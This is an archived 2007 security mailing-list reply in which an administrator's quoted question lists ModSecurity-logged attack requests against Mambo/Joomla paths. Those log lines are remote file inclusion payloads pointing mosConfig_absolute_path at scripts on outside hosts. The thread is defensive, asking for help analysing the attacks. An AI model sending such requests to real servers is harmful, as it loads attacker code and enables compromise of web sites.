Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Security-Basics
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

RE: PHP web exploit/vulnerability

from [David Gutierrez] Network Security [Permanent Link]
Subject: RE: PHP web exploit/vulnerability
Date: Tue, 23 Oct 2007 12:16:54 -0500 

Camilo, 
Feel free to post it or send me a copy via email. 

David 

----------------------------------------> Date: Tue, 23 Oct 2007 11:29:47 
-0500> From: colea@sunset.com.mx> To: security-basics@securityfocus.com> 
Subject: PHP web exploit/vulnerability>> Hello everyone,>> I'm sorry if this is 
a stupid question, but I just wanted your input,> maybe direct me to some 
links, another mail list, or whatever you might> add would be highly 
appreciated; we have modsecurity installed on our> server, and it has been 
logging many attacks like the following:>> GET> 
/content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://beach.tsv-detti>
 \> ngen.de/admin/ec.txt? HTTP/1.1>> GET> 
/index.php?option=com_%3Cwbr%20//mambots/*.php?mosConfig_absolute_path=uid=48(apache)%>
 \> 20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1>> GET 
/index.php?option=http://0x0134.lan.io/pb.php? HTTP/1.1>> I managed to get a 
copy of the php script which these attacks try to> force the server to execute, 
I could post it here if that is correct and> anybody could take a look at it 
and help me out a little to understand> what it's trying to do.>> Any help is 
appreciated, thanks in advance.>> Camilo Olea>>>

_________________________________________________________________
Windows Live Hotmail and Microsoft Office Outlook – together at last.  Get it 
now.
http://office.microsoft.com/en-us/outlook/HA102225181033.aspx?pid=CL100626971033
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: why most sql injection is not occurred at mysql?, Brian Daniel Beck
Next by Date:  RE: Firewall rulebase audit, Kevin Ortloff
Previous by Thread:  PHP web exploit/vulnerability, Camilo Olea
Next by Thread:  Re: PHP web exploit/vulnerability, Danux
Indexes:  [Date] [Thread] [Top] [All Lists]